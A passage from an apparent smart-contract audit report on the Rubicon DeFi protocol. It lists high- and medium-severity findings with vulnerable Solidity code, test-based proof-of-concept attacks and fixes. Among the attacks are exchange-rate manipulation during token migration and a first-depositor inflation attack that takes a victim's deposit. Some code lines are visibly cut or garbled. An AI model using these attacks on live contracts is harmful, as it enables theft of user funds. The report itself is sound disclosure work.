function exchangeRateStoredInternal() virtual internal view returns (uint) {
    uint _totalSupply = totalSupply;
    if (_totalSupply == 0) {
            * If there are no tokens minted:
            *  exchangeRate = initialExchangeRate
        return initialExchangeRateMantissa;
    } else {
            * Otherwise:
            *  exchangeRate = (totalCash + totalBorrows - totalReserves) / totalSupply
        uint totalCash = getCashPrior();
        uint cashPlusBorrowsMinusReserves = totalCash + totalBorrows - totalReserves;
        uint exchangeRate = cashPlusBorrowsMinusReserves * expScale / _totalSupply;

        return exchangeRate;

Essentially, more tokens will be minted if the rate is decreased, as it is dividing the actualMintAmount, which could be done by increasing the totalSupply. The opposite effect can be done by increasing the totalCash or the totalBorrows, for example.

Proof of Concept

This scenario can be abused by attackers willing to harm other users that are migrating from one type of token to another, knowing that the liquidity of the pool is low.

The following script shows how an attacker is able to manipulate the price of the V2 token by borrowing in the same market. The output shows both scenarios, when the price is manipulated and when it is under normal conditions.

  it("can manipulate the migration yield", async function () {
    const { testCoin, migrator, bathTokenV1, bathTokenV2, owner, otherAccount, comptroller } = await loadFixture(
    // *** POOLS UTILITY
    const PriceOracleFactory = await ethers.getContractFactory(
    const priceOracle = await PriceOracleFactory.deploy();
    await priceOracle.addCtoken(testCoin.address, parseUnits("1", 30));
    await priceOracle.addCtoken(bathTokenV2.address, parseUnits("1", 30));

    await comptroller._setPriceOracle(priceOracle.address);
    await comptroller._supportMarket(bathTokenV2.address)

    await comptroller._setCollateralFactor(
      parseUnits("0.9", 18)
    ); // 90% of collateral is borrowable
    await comptroller._setBorrowPaused(bathTokenV2.address, false)

    const simulatedFlashloanAmount = 10_000_000
    await testCoin.connect(otherAccount).faucetWithAmountUnchecked(simulatedFlashloanAmount); // 10MM flashloan of testCoins
    const initialTestBalance = await testCoin.balanceOf(otherAccount.address)
    console.log(`Initial - TestCoin Balance [Attacker]: ${initialTestBalance}`)
    // A big borrow lands before the migration
    await testCoin.connect(otherAccount).approve(bathTokenV2.address, initialTestBalance);
    await bathTokenV2.connect(otherAccount).mint(initialTestBalance);
    console.log(`\nBefore Borrow - TestCoin Balance [Attacker]: ${await testCoin.balanceOf(otherAccount.address)}`)
    await bathTokenV2.connect(otherAccount).borrow(initialTestBalance.mul(89).div(100));
    console.log(`After Borrow - TestCoin Balance [Attacker]: ${await testCoin.balanceOf(otherAccount.address)}`)

    // ======= Comment/Uncomment this for the manipulated scenario ===========
    // await testCoin.connect(otherAccount).approve(bathTokenV2.address, ethers.constants.MaxUint256);
    // await bathTokenV2.connect(otherAccount).repayBorrow((await testCoin.balanceOf(otherAccount.address)))
    // =======================================================================

    // bath balance before migration
    const bathTokenV1BalanceBefore = await bathTokenV1.balanceOf(owner.address);
    const bathTokenV2BalanceBefore = await bathTokenV2.balanceOf(owner.address);
    console.log(`\nBefore Migration - BathTokenV1 Balance [Victim]: ${bathTokenV1BalanceBefore}`)
    console.log(`Before Migration - BathTokenV2 Balance [Victim]: ${bathTokenV2BalanceBefore}`)

    await bathTokenV1.approve(migrator.address, bathTokenV1BalanceBefore);
    await migrator.migrate(bathTokenV1.address);

    // bath balance after migration
    const bathTokenV1BalanceAfter = await bathTokenV1.balanceOf(owner.address);
    const bathTokenV2BalanceAfter = await bathTokenV2.balanceOf(owner.address);

    console.log(`\nAfter Migration - BathTokenV1 Balance [Victim]: ${bathTokenV1BalanceAfter}`)
    console.log(`After Migration - BathTokenV2 Balance [Victim]: ${bathTokenV2BalanceAfter}`)

    const underlyingBalanceBefore = await testCoin.balanceOf(owner.address);
    await bathTokenV2.approve(bathTokenV2.address, bathTokenV2BalanceAfter);
    await bathTokenV2.redeem(bathTokenV2BalanceAfter);
    const underlyingBalanceAfter = await testCoin.balanceOf(owner.address);
    console.log(`\nAfter Redemption - TestCoin (Underlying) Balance [Victim]: ${underlyingBalanceAfter}`)
    console.log(`After Redemption - BathTokenV2 Balance [Victim]: ${await bathTokenV2.balanceOf(owner.address)}`)
Initial - TestCoin Balance [Attacker]: 10000000000000000000000000

Before Borrow - TestCoin Balance [Attacker]: 0
After Borrow - TestCoin Balance [Attacker]: 8900000000000000000000000

Before Migration - BathTokenV1 Balance [Victim]: 14999999999999999000
Before Migration - BathTokenV2 Balance [Victim]: 0

After Migration - BathTokenV1 Balance [Victim]: 0
After Migration - BathTokenV2 Balance [Victim]: 74977479826

After Redemption - TestCoin (Underlying) Balance [Victim]: 9899995505034745960181
After Redemption - BathTokenV2 Balance [Victim]: 0
Initial - TestCoin Balance [Attacker]: 10000000000000000000000000

Before Borrow - TestCoin Balance [Attacker]: 0
After Borrow - TestCoin Balance [Attacker]: 8900000000000000000000000

Before Migration - BathTokenV1 Balance [Victim]: 14999999999999999000
Before Migration - BathTokenV2 Balance [Victim]: 0

After Migration - BathTokenV1 Balance [Victim]: 0
After Migration - BathTokenV2 Balance [Victim]: 74977479826

After Redemption - TestCoin (Underlying) Balance [Victim]: 9899995500999977864007
After Redemption - BathTokenV2 Balance [Victim]: 0

It is simulating the amount of underlying tokens that the victim would receive in either cases. The difference between the scenario A and B (without repayment and repaying the borrow) is: WITHOUT_REPAYING - WITH_REPAYMENT = 19899995499999977864007 - 19899995504034745960181 = -4034768096174, considering that the TestCoin has 8 decimals and is a valuable token (like WBTC), the loss of migrating will mean 40347 of tokens, even if the price is 1 USD per token, the loss is considerable.


Simulate the amount of underlying tokens users would get if they redeem the whole BathV2 amount immediately after migrating and allow users to set up a slippage on the amount of underlying tokens they would get (comparing against the simulated amount).

daoio (Rubicon) acknowledged

[H-15] The last borrowed asset will not be collateralized and the user may be liquidated due to insufficient collateral

Submitted by cccz, also found by sinarette.

All leveraged positions are opened by simple recursive borrowing loop (supply collateral → borrow → swap → repeat). The issue here is that the last borrowed asset will not be collateralized.

    function _borrowLoop(
        address _asset,
        address _quote,
        address _bathTokenAsset,
        address _bathTokenQuote,
        uint256 _amount,
        uint256 _toBorrow
    ) internal returns (uint256 _bathTokenAmount) {
        // supply collateral
        _bathTokenAmount = _supply(_asset, _bathTokenAsset, _amount);

        // calculate how much is needed to borrow from _maxBorrow amount
        //_toBorrow = (_maxBorrow(_bathTokenQuote).mul(_toBorrow)).div(WAD);
        _toBorrow = wmul(_maxBorrow(_bathTokenQuote), _toBorrow);

        // swap borrowed quote tokens to asset tokens
        _borrow(_bathTokenQuote, _toBorrow);
        _rubiconSwap(_asset, _quote, _toBorrow, true);
            // increase bathToken amount in order to save it in positions map
            vars.currentBathTokenAmount += _borrowLoop(

Consider the WBTC collateralization rate is 0.7.

Alice uses 1e8 WBTC and 1.7x leverage to long WBTC

In _borrowLoop, 1e8 WBTC is collateralized and borrowed to USDC, and 0.7e8 WBTC is purchased using USDC, and the 0.7e8 WBTC is uncollateralized. At this point, the user’s collateral is 1e8 WBTC and the borrowed USDC is worth 0.7e8 WBTC. If the price of WBTC drops slightly, the user will be liquidated.

The POC below indicates the purchased WBTC is not collateralized:

    describe("Long positions 📈", function () {
      it("POC1", async function () {
        const { owner, testCoin, testStableCoin, Position } = await loadFixture(
        const TEST_AMOUNT_1 = parseUnits("1");
        const x1_7 = parseUnits("1.7");

        await Position.connect(owner).buyAllAmountWithLeverage(

        const position = await Position.positions(1);

        console.log("borrowedAmount1 : %s",position[2]);
        console.log("testCoin balance in position : %s",await testCoin.balanceOf(Position.address));
  Leverage positions Test
    Pools Utility Test
      Long positions 📈
borrowedAmount1 : 630000
testCoin balance in position : 692923770693000000

Proof of Concept

Tools Used


When the loop in openPosition ends, collateralize the remaining assets in the contract.

            vars.currentBathTokenAmount += _borrowLoop(
+       vars.currentBathTokenAmount += _supply(asset, bathTokenAsset, IERC20(asset).balanceOf(address(this));
        /// @dev save total borrow amount of this current position
        vars.borrowedAmount = (borrowBalance(bathTokenQuote)).sub(

daoio (Rubicon) confirmed

[H-16] Due to the loss of precision, openPosition will make the user’s leverage higher than expected

Submitted by cccz.

openPosition creates a leveraged position for the user based on initMargin and leverage, and in _borrowLimit, it calculates the number of borrowing loops needed to reach the desired amount.

        (vars.limit, vars.lastBorrow) = _borrowLimit(

For example, if initMargin = 1e18 and leverage = 2, then _desiredAmount = 2e18. If the collateral factor is 0.7, the user’s position after the first borrowing is 1e18 + 1e18 * 0.7 = 1.7e18, and the user’s position after the second borrowing is 1e18 + 1e18 * 0.7 + 1e18 * 0.7 * 0.7 = 2.19e18.

        uint256 _desiredAmount = wmul(_assetAmount, _leverage);

        // check if collateral was already supplied
        uint256 _minted = IERC20(_bathToken).balanceOf(address(this));
	// how much is borrowed on a current loop
        uint256 _loopBorrowed;

        while (_assetAmount <= _desiredAmount) {
            if (_limit == 0) {
		// if collateral already provided
                if (_minted != 0) {
                    uint256 _max = _maxBorrow(_bathToken);

		    // take into account previous collateral
                    _loopBorrowed = wmul(_assetAmount, _collateralFactor).add(
                } else {
                    _loopBorrowed = wmul(_assetAmount, _collateralFactor);
            } else {
                _loopBorrowed = wmul(_loopBorrowed, _collateralFactor);

            // here _assetAmount refers to the
            // TOTAL asset amount in the position
            _assetAmount += _loopBorrowed;

For the excess of 0.19e18, _lastBorrow is used as the percentage of the last borrow. It should be noted that when _lastBorrow = 0, it means that the percentage of this borrowing is 100%.

            if (_assetAmount > _desiredAmount) {
                // in case we've borrowed more than needed
                // return excess and calculate how much is
                // needed to borrow on the last loop
                // to not overflow _desiredAmount
                uint256 _borrowDelta = _desiredAmount.sub(
                _lastBorrow = _borrowDelta.mul(WAD).div(_loopBorrowed);

            } else if (_assetAmount == _desiredAmount) {
                // 1x short or perfect matching
            } else {
                // default case
            if (i.add(1) == vars.limit && vars.lastBorrow != 0) {
                vars.toBorrow = vars.lastBorrow;
            } else {
                // otherwise borrow max amount available to borrow - 100% from _maxBorrow
                vars.toBorrow = WAD;

Although the long leverage must be greater than 1e18, the user can make the long leverage = 1e18+1 to make the long leverage small. But in this case, the loss of precision in the calculation will cause the user to have a higher leverage than expected.

    function _leverageCheck(uint256 _leverage, bool _long) internal pure {
        uint256 _wad = WAD;
        uint256 _leverageMax = WAD.mul(3);

        _long // long can't be with 1x leverage
            ? require(
                _leverage > _wad && _leverage <= _leverageMax,
                "_leverageCheck{Long}: INVLAID LEVERAGE"
            : require(
                _leverage >= _wad && _leverage <= _leverageMax,
                "_leverageCheck{Short}: INVLAID LEVERAGE"

Consider the following scenario:

The collateral factor of WBTC is 0.7. Alice provides 4e8 WBTC and 1e18+1 long leverage to call the buyAllAmountWithLeverage function. Since wmul is rounded rather than rounded up, the _desiredAmount calculated in _borrowLimit is equal to wmul(4e8,1e18+1) = 4e8.

        uint256 _desiredAmount = wmul(_assetAmount, _leverage);

After that, since _borrowDelta == 0, _borrowLimit returns limit == 1 and _lastBorrow == 0.

            if (_assetAmount > _desiredAmount) {
                // in case we've borrowed more than needed
                // return excess and calculate how much is
                // needed to borrow on the last loop
                // to not overflow _desiredAmount
                uint256 _borrowDelta = _desiredAmount.sub(
                _lastBorrow = _borrowDelta.mul(WAD).div(_loopBorrowed);


Then in openPosition, since _lastBorrow = 0, borrowing will be done so that Alice’s position reaches 4e8+4e8 * 0.7 = 6.8 WBTC, at which point Alice’s leverage is 1.7e18, much larger than Alice’s expectations, too high leverage will increase the risk of Alice is liquidated.

            if (i.add(1) == vars.limit && vars.lastBorrow != 0) {
                vars.toBorrow = vars.lastBorrow;
            } else {
                // otherwise borrow max amount available to borrow - 100% from _maxBorrow
                vars.toBorrow = WAD;

            // increase bathToken amount in order to save it in positions map
            vars.currentBathTokenAmount += _borrowLoop(

Proof of Concept

The POC and output are as follows. It can be seen that the borrowed amount of 1e18+1 is greater than 1.25e18 and 1.337e18, and the actual leverage of 1e18+1 is 1.7e18.

    describe("Long positions 📈", function () {
      it("POC1", async function () {
        const { owner, testCoin, testStableCoin, Position } = await loadFixture(
        const TEST_AMOUNT_0_4 = parseUnits("0.4");
        const x1_1 = parseUnits("1.000000000000000001");

        await Position.connect(owner).buyAllAmountWithLeverage(

        const position = await Position.positions(1);

        console.log("borrowedAmount1 : %s",position[2]);

      it("POC2", async function () {
        const { owner, testCoin, testStableCoin, Position } = await loadFixture(
        const TEST_AMOUNT_0_4 = parseUnits("0.4");
        await Position.connect(owner).buyAllAmountWithLeverage(

        const position = await Position.positions(1);

        console.log("borrowedAmount2 : %s",position[2]);

      it("POC3", async function () {
        const { owner, testCoin, testStableCoin, Position } = await loadFixture(
        const TEST_AMOUNT_0_4 = parseUnits("0.4");
        await Position.connect(owner).buyAllAmountWithLeverage(

        const position = await Position.positions(1);

        console.log("borrowedAmount3 : %s",position[2]);
borrowedAmount1 : 252000
        ✓ POC1
borrowedAmount2 : 90000
        ✓ POC2
borrowedAmount3 : 121320
        ✓ POC3

Tools Used


Consider rounding up in _borrowLimit when calculating _desiredAmount. Or consider not borrowing when _lastBorrow = 0 and modifying the logic of the rest of the code.

daoio (Rubicon) disagreed with severity and commented:

It’s true, but leverage values seem too unrealistic to be used in real life (that’s why I disagree with severity). Though, this finding reveals irrelevance of such huge precision for leverage param $=>$. Need to make it less precise.

HickupHH3 (judge) commented:

but leverage values seem too unrealistic to be used in real life

No it isn’t; the warden showed how using a leverage of 1.000000000000000001x ended up using a borrow amount of 252000, whereas a leverage of 1.25x and 1.337x borrowed smaller amounts of 90000 and 121320 respectively.

[H-17] First depositor bug on unmodified Compound fork

Submitted by thekmj, also found by nirlin, Ruhum, Qeew, 33audits and fs0c.

The CToken implementation has the well-known first depositor bug that allows an attacker to manipulate the exchange rate of a CToken, allowing them to steal funds from depositing users.

Furthermore, due to the way the current BathHouse is implemented, not allowing an admin to create multiple markets for one underlying (see below code snippet), the entire BathHouse will be bricked as soon as any CToken market is attacked.

function createBathToken(
    address underlying,
    InterestRateModel interestRateModel,
    uint256 initialExchangeRateMantissa,
    address implementation,
    bytes memory becomeImplementationData
) external onlyAdmin {
    // underlying can be used only for one bathToken
        tokenToBathToken[underlying] == address(0),
    // ...   

The first-deposit front-running attack

An attack can happen as follow:

  1. A CToken contract is created. The CToken total supply is ‘0’, and no deposits have been made.
  2. Alice the attacker mints a single CToken using her own funds.
  3. Alice directly does a ERC20 transfer of the underlying to the CToken contract itself, inflating the exchange rate of the CToken.
  4. Bob the user deposits some amount of underlying to mint CTokens.

    • Bob receives much less CTokens than he should have, due to exchange rate being inflated.
  5. Alice now has a much larger share of the pool than what she should have gotten.

Since it is intended that the BathTokens are created by an admin through the contract BathHouseV2.sol by calling createBathToken(), an adversary can perform the front-running attack as soon as a BathToken is deployed.

It has been shown in the above section that a new market cannot be created on the same underlying, if such an attack were to happen.

There are several impacts that such an attack can have:

  • Direct theft of users’ deposits.
  • Direct theft of migrated V2 funds, if the user uses a V2Migrator set with a manipulated market.
  • Redeployment of BathHouse by creating unrecoverable scenarios.
  • Preventing the protocol from launching new markets, as any newly launched market can be sniped to attack.

We believe this is high risk, as this will result in possible fund loss, will brick the deployed BathHouse contract, as well as loss of safety in supporting new assets.

Proof of concept

Use the following test case on ProtocolDeployment.t.sol for a demonstration of the front-running attack.

function test_bug_firstDepositAttack() public {
  address alice = address(0xA11CE);
  address bob = address(0xB0B);

  // deal out tokens first
  TEST.transfer(alice, 200e18);
  TEST.transfer(bob, 100e18);

  // initial config
  assertEq(bathTEST.exchangeRateStored(), 2e26);
  assertEq(bathTEST.totalSupply(), 0);
  assertEq(bathTEST.balanceOf(alice), 0);

  // mint tokens
  TEST.approve(address(bathTEST), type(uint256).max);
  assertEq(bathTEST.balanceOf(alice), 1);
  assertEq(bathTEST.totalSupply(), 1);

  // alice front-running attack
  TEST.transfer(address(bathTEST), 100e18);
  assertEq(bathTEST.getCash(), 100e18 + 2e8);

  // bob now deposits
  TEST.approve(address(bathTEST), type(uint256).max);
  assertEq(bathTEST.balanceOf(bob), 0); // attacked! bob should've gotten some bathTokens
  assertEq(bathTEST.totalSupply(), 1);

  // alice redeems and gets everything
  assertEq(TEST.balanceOf(alice), 300e18); // alice stole 100e18 from Bob
  assertEq(bathTEST.totalSupply(), 0);

The attack can happen when the CToken total supply is ‘0’ or very low. The fix is to force-mint a minimum amount of CTokens that cannot be burned to either governance/admin, address(0), or perform such when the first mint happens.

A fix is demonstrated below, on the function mintFresh in contract CToken. This is also how Uniswap V2 prevents the same attack.

function mintFresh(address minter, uint mintAmount) internal {
    // ...
    Exp memory exchangeRate = Exp({mantissa: exchangeRateStoredInternal()});

    uint actualMintAmount = doTransferIn(minter, mintAmount);

    uint mintTokens = div_(actualMintAmount, exchangeRate);

    // fix starts
    if (totalSupply == 0) {
        totalSupply = 1000;
        accountTokens[address(0)] = 1000;
        mintTokens -= 1000;
    // fix ends

    totalSupply = totalSupply + mintTokens;
    accountTokens[minter] = accountTokens[minter] + mintTokens;
    // ...

daoio (Rubicon) acknowledged via duplicate issue #1156

neko_nyaa (warden) commented via duplicate issue #1156:

Would do like the judge and sponsor to reconsider the impacts of this finding.

The CToken is meant to be deployed from BathHouse using the following admin-only function, which is in-scope.

function createBathToken(
   address underlying,
   InterestRateModel interestRateModel,
   uint256 initialExchangeRateMantissa,
   address implementation,
   bytes memory becomeImplementationData
) external onlyAdmin {
   // ...
       tokenToBathToken[underlying] == address(0),
   // ...   

As shown on this function, only one BathToken can be created per ERC20 token. Thus, the impact of this attack is not only a redeployment, but it also directly affects in-scope contracts by bricking said market, since the market actually cannot be redeployed.

Therefore the bug directly affects in-scope contracts, and can be seen as erroneous integration of code forks.

This is also mentioned in the #143 report. I believe none of the other reports mentioned this.

HickupHH3 (judge) commented:

Report was initially redacted, added in the content.

One detail that all other dups failed to mention was the bricking of re-creation of markets with the same underlying (other than from lost assets), which was what brought this bug in-scope. It is of course possible to do an entire re-deployment, but that would require re-deployments of all existing prior markets as well.

Medium Risk Findings (28)

[M-01] Fee inclusivity calculations are inaccurate in RubiconMarket

Submitted by adriro, also found by minhtrng, zhuXKET, zhuXKET, zhuXKET, minhtrng, McToady, McToady, LaScaloneta, joestakey, sinarette, kutugu, __141345__, ast3ros, sces60107, cccz, cloudjunky, rvierdiiev, cccz, Ace-30, cccz, zaevlad, Ace-30, John, said, said, ljmanini, nobody2018, J4de, ckksec, 0xnev and SpicyMeatball.

Trading in the RubiconMarket has associated fee costs that are paid by the taker of the offer. These fees include the protocol fee and a new “maker fee” introduced in v2. Fees are pulled from the taker (caller of the function) independently of the trade amount, which means fees are not included in the trade amount. These are implemented in the buy function of the base contract SimpleMarket:

337:         /// @dev Fee logic added on taker trades
338:         uint256 fee = mul(spend, feeBPS) / 100_000;
339:         require(
340:             _offer.buy_gem.transferFrom(msg.sender, feeTo, fee),
341:             "Insufficient funds to cover fee"
342:         );
344:         // taker pay maker 0_0
345:         if (makerFee() > 0) {
346:             uint256 mFee = mul(spend, makerFee()) / 100_000;
348:             /// @dev Handle the v1 -> v2 migration case where if owner == address(0) we transfer this fee to _offer.recipient
349:             if (_offer.owner == address(0) && getRecipient(id) != address(0)) {
350:                 require(
351:                     _offer.buy_gem.transferFrom(
352:                         msg.sender,
353:                         _offer.recipient,
354:                         mFee
355:                     ),
356:                     "Insufficient funds to cover fee"
357:                 );
358:             } else {
359:                 require(
360:                     _offer.buy_gem.transferFrom(msg.sender, _offer.owner, mFee),
361:                     "Insufficient funds to cover fee"
362:                 );
363:             }
365:             emit emitFee(
366:                 bytes32(id),
367:                 msg.sender,
368:                 _offer.owner,
369:                 keccak256(abi.encodePacked(_offer.pay_gem, _offer.buy_gem)),
370:                 _offer.buy_gem,
371:                 mFee
372:             );
373:         }

One of the new additions in the RubiconMarket v2 is fee inclusivity, a feature that would allow users to operate on the market by including the fee directly in the specified amount. This is present in different places of the contract, but the core implementation can be founded in the calcAmountAfterFee function:

578:     function calcAmountAfterFee(
579:         uint256 amount
580:     ) public view returns (uint256 _amount) {
581:         require(amount > 0);
582:         _amount = amount;
583:         _amount -= mul(amount, feeBPS) / 100_000;
585:         if (makerFee() > 0) {
586:             _amount -= mul(amount, makerFee()) / 100_000;
587:         }
588:     }

As we can see in the previous snippet, the function calculates the protocol fee and the marker fee based on the given amount, and substacts those values from the amount. This is an inaccurate calculation, as these fees later on will be calculated using this new value, which won’t end up totalling the requested original amount. As an example, let’s consider the case of 100 tokens, a 10% protocol fee and a 5% maker fee:

  1. Initial amount is 1000 tokens.
  2. Protocol fee is 1000 * 10% = 100 tokens.
  3. Maker fee is 1000 * 5% = 50 tokens.
  4. Resulting amount of calcAmountAfterFee will be 1000 - 100 - 50 = 850 tokens.
  5. In the core buy function, the trade amount will be 850 tokens, and the function will then calculate fees based on this amount.
  6. Protocol fee will be calculated as 850 * 10% = 85 and maker fee will be calculated as 850 * 5% = 42 tokens.
  7. This means that the user will end up paying 850 for the trade, 85 for the protocol fee and 42 for the maker fee. 850 + 85 + 42 = 977 which is a bit less than the original 1000 tokens.

Proof of Concept

In the following test, Alice makes an offer to sell 30k USDC for 1 BTC. Bob will execute the trade to buy the complete 30k USDC with BTC. However, as the fee calculation is inaccurate, the trade will be executed for an amount less than expected and Bob will be left with some unspent BTC (0.000225 BTC).

  Bob BTC balance: 225000000000000

Note: the snippet shows only the relevant code for the test. Full test file can be found here.

function test_RubiconMarket_buy_IncorrectFeeInclusivity() public {
    // Alice has 30k USDC, bob has 1 BTC, 30_000 ether);, 1 ether);

    // Alice creates the offer to sell USDC for BTC
    USDC.approve(address(market), type(uint256).max);
    bytes32 id = market.make(
        USDC, // pay
        BTC, // buy
        30_000 ether, // pay_amount
        1 ether // buy_amount

    // Bob trades his BTC for USDC
    BTC.approve(address(market), type(uint256).max);
    vm.prank(bob);, 30_000 ether);

    console.log("Bob BTC balance:", BTC.balanceOf(bob));


The correct calculation for the fee inclusivity amount should be as follows:

result = amount / (100% + protocol fee + maker fee)

For the example given in the previous section, this would result in an amount of 1000 / (100% + 10% + 5%) = 869.

daoio (Rubicon) confirmed

HickupHH3 (judge) commented:

There are so many things wrong with the fee calculation and accounting that it’s difficult for me to properly separate the issues (and numerous proposed mitigations to the point I get confused on what the best way forward is).

I’m going to leave all issues regarding fee inclusivity & incorrect calculation with calcAmountAfterFee() in this one.

#282 deals with fee accounting issues in _marketBuy() and _marketSell().

HickupHH3 (judge) commented:

Out of all the reports I’ve seen, this one explains the issue on incorrect fee calculation the best in my opinion, with effects on the protocol and maker fee receiving less than expected.

The correct formula for fee inclusivity that’s been mathematically proven is here:

So the calculated amount should be: amount - (marketFee + protocolFee) * amount / (BPS + marketFee + protocolFee).

In my example, I’m using BPS = 10k, I know the impl uses a non-conventional 100k instead.

  • marketFee = 500 = 5%
  • protocolFee = 1000 = 10%

Expected amount after fees = 1000 - (1000 + 500) * 1000 / (10_000 + 1000 + 500) = 869.

[M-02] Low level calls to accounts with no code will succeed in FeeWrapper

Submitted by adriro, also found by Udsen, oualidpro, descharre, Rolezn, immeas, Breeje, jasonxiale and zaevlad.

The FeeWrapper contract wraps calls to an arbitrary target contract to add support for fees. The implementation executes a low level call to proxy the call to the target contract. This can be seen in the _rubicall and _rubicallPayable functions:

60:     function _rubicall(
61:         CallParams memory _params
62:     ) internal returns (bytes memory) {
63:         // charge fee from feeParams
64:         _chargeFee(_params.feeParams,;
66:         (bool _OK, bytes memory _data) =
67:             bytes.concat(_params.selector, _params.args)
68:         );
70:         require(_OK, "low-level call to the Rubicon failed");
72:         return _data;
73:     }

76:     function _rubicallPayable(
77:         CallParams memory _params
78:     ) internal returns (bytes memory) {
79:         // charge fee from feeParams
80:         uint256 _msgValue = _chargeFeePayable(_params.feeParams);
82:         (bool _OK, bytes memory _data) ={value: _msgValue}(
83:             bytes.concat(_params.selector, _params.args)
84:         );
86:         require(_OK, "low-level call to the router failed");
88:         return _data;
89:     }

Low level calls behave differently than function calls in Solidity. Calls at the EVM level to accounts with no code are successful, this is the expected and normal behavior. It is Solidity that adds checks to prevent accidental calls to accounts with no code while compiling code for normal function calls.

This means that if the target account has no code, then the wrapped call using the FeeWrapper contract will succeed and the operation will be executed successfully. An accidental mistake may go unnoticed and may also cause unexpected loss of funds, as this call may include call value for transferring ETH.

Proof of Concept

In the following test, we use the FeeWrapper contract to execute a call to an account with no code. The transaction will succeed and the ETH will be transferred to the target account.

Note: the snippet shows only the relevant code for the test. Full test file can be found here.

function test_FeeWrapper_CallsToAccountsNoCodeSucceed() public {
    FeeWrapper.CallParams memory callParams;
    callParams.selector = bytes4(0x01020304);
    callParams.args = abi.encode(uint256(42)); = makeAddr("address with no code");
    callParams.feeParams.totalAmount = 0.1 ether;
    callParams.feeParams.feeAmount = 0.01 ether;
    callParams.feeParams.feeTo = makeAddr("FeeRecipient");

    // Target has no code
    assertEq(, 0);

    // Call succeeds even though the target has no code and no implementation
    feeWrapper.rubicall{value: 0.1 ether}(callParams);


While executing low level calls, the _rubicall and _rubicallPayable functions should check that either the account has code or the return data is greater than zero (which indicates the presence of an implementation). The OpenZeppelin contracts library provides utilities to execute low level calls in a safe way, including the recommended checks, present in the Address library, functionCall and functionCallWithValue.

daoio (Rubicon) confirmed

HickupHH3 (judge) commented:

Value lost would be msg.value, preventing it has a low cost, sticking to Medium. Reference here.

[M-03] Rewards for initial period may be lost in BathBuddy contract

Submitted by adriro.

Rewards in the BathBuddy contract are initiated when the owner calls the notifyRewardAmount. This function calculates the reward rate per second (lines 196-198 and 207-208) and also records the start of the reward period (line 223):

191:     function notifyRewardAmount(
192:         uint256 reward,
193:         IERC20 rewardsToken
194:     ) external onlyOwner updateReward(address(0), address(rewardsToken)) {
195:         if (block.timestamp >= periodFinish[address(rewardsToken)]) {
196:             rewardRates[address(rewardsToken)] = reward.div(
197:                 rewardsDuration[address(rewardsToken)]
198:             );
199:         } else {
200:             uint256 remaining = periodFinish[address(rewardsToken)].sub(
201:                 block.timestamp
202:             );
203:             uint256 leftover = remaining.mul(
204:                 rewardRates[address(rewardsToken)]
205:             );
206:             rewardRates[address(rewardsToken)] = reward.add(leftover).div(
207:                 rewardsDuration[address(rewardsToken)]
208:             );
209:         }
211:         // Ensure the provided reward amount is not more than the balance in the contract.
212:         // This keeps the reward rate in the right range, preventing overflows due to
213:         // very high values of rewardRate in the earned and rewardsPerToken functions;
214:         // Reward + leftover must be less than 2^256 / 10^18 to avoid overflow.
215:         // Note********** ERC20s must be here*************
216:         uint256 balance = rewardsToken.balanceOf(address(this));
217:         require(
218:             rewardRates[address(rewardsToken)] <=
219:                 balance.div(rewardsDuration[address(rewardsToken)]),
220:             "Provided reward too high"
221:         );
223:         lastUpdateTime[address(rewardsToken)] = block.timestamp;
224:         periodFinish[address(rewardsToken)] = block.timestamp.add(
225:             rewardsDuration[address(rewardsToken)]
226:         );
227:         emit RewardAdded(reward);
228:     }

The intention here is to calculate how many tokens should be rewarded by unit of time (second) and record the span of time for the reward cycle. However, this has an edge case where rewards are not counted for the initial period of time until there is at least one participant (in this case, a holder of BathTokens). During this initial period of time, the reward rate will still apply but as there isn’t any participant, then no one will be able to claim these rewards. See PoC for a detailed example of the issue.

Proof of Concept

In the following test, we initiate the reward process by calling notifyRewardAmount. At the middle of the duration process, we mint BathTokens to Alice to represent her participation. At the end of the duration process, after Alice claims her rewards, half of them will still be held in the BathBuddy contract.

Note: the snippet shows only the relevant code for the test. Full test file can be found here.

function test_BathBuddy_RewardsLostForInitialPeriod() public {
    // Setup rewards
    uint256 startTime = block.timestamp;
    uint256 duration = 10_000 seconds;
    bathBuddy.setRewardsDuration(duration, address(rewardToken));

    uint256 rewardAmount = 100 ether;, rewardAmount);
    bathBuddy.notifyRewardAmount(rewardAmount, rewardToken);

    // Simulate half of the duration time passes
    vm.warp(startTime + duration / 2);

    // Trigger updateRewards to update state
    bathBuddy.getReward(rewardToken, address(0));

    // Mint bathTokens to Alice
    uint256 bathTokenAmount = 1 ether;, bathTokenAmount);

    // Simulate complete duration time passes
    vm.warp(startTime + duration);

    // Trigger getRewards for Alice
    bathBuddy.getReward(rewardToken, alice);

    // Alice will only get half of the rewards. The other half will be stuck in the contract.
    assertEq(rewardToken.balanceOf(alice), rewardAmount / 2);
    assertEq(rewardToken.balanceOf(address(bathBuddy)), rewardAmount / 2);


A possible solution to the issue would be to set the start and end time for the current reward cycle when the first participant joins the reward program, i.e. when the total supply is greater than zero, instead of starting the process in the notifyRewardAmount.


The following reports can be used as a reference for the described issue:

daoio (Rubicon) confirmed

[M-04] BathBuddy contract should implement methods to pause and unpause contract

Submitted by adriro, also found by brgltd, 0xnacho, zhuXKET, Ace-30, ddimitrov22, markus_ether, AlexCzm, qbs, luciana, juancito, said, cccz, bytes032 and T1MOH.

The BathBuddy contract inherits from OpenZeppelin Pausable contract with the intention of adding pausing features to the contract.

38: contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {

The Pausable implementation contains all the logic to implement pausing, but doesn’t include any external or public functionality to actually trigger the pause or resume, this task is left to the derived contract.

The BathBuddy contract fails to implement these functions, as there is no callable function from the outside that modifies the pause state. The pausing mechanism is intended to be used in the getReward function, as this function includes the whenNotPaused:

168:     function getReward(
169:         IERC20 rewardsToken,
170:         address holderRecipient
171:     )
172:         external
173:         override
174:         nonReentrant
175:         whenNotPaused
176:         updateReward(holderRecipient, address(rewardsToken))
177:         onlyBathHouse
178:     {
179:         uint256 reward = tokenRewards[address(rewardsToken)][holderRecipient];
180:         if (reward > 0) {
181:             tokenRewards[address(rewardsToken)][holderRecipient] = 0;
182:             rewardsToken.safeTransfer(holderRecipient, reward);
183:             emit RewardPaid(holderRecipient, reward);
184:         }
185:     }

This means that protocol admin won’t be able to pause this function if needed as there is no accessible function to enable the mechanism at all.

Proof of Concept

The BathBuddy contract code doesn’t include any external or public function to pause or resume the contract. The OpenZeppelin implementations only contains internal functions to provide support so that the derived contract implements the public interface:

  * @dev Triggers stopped state.
  * Requirements:
  * - The contract must not be paused.
function _pause() internal virtual whenNotPaused {
    _paused = true;
    emit Paused(_msgSender());

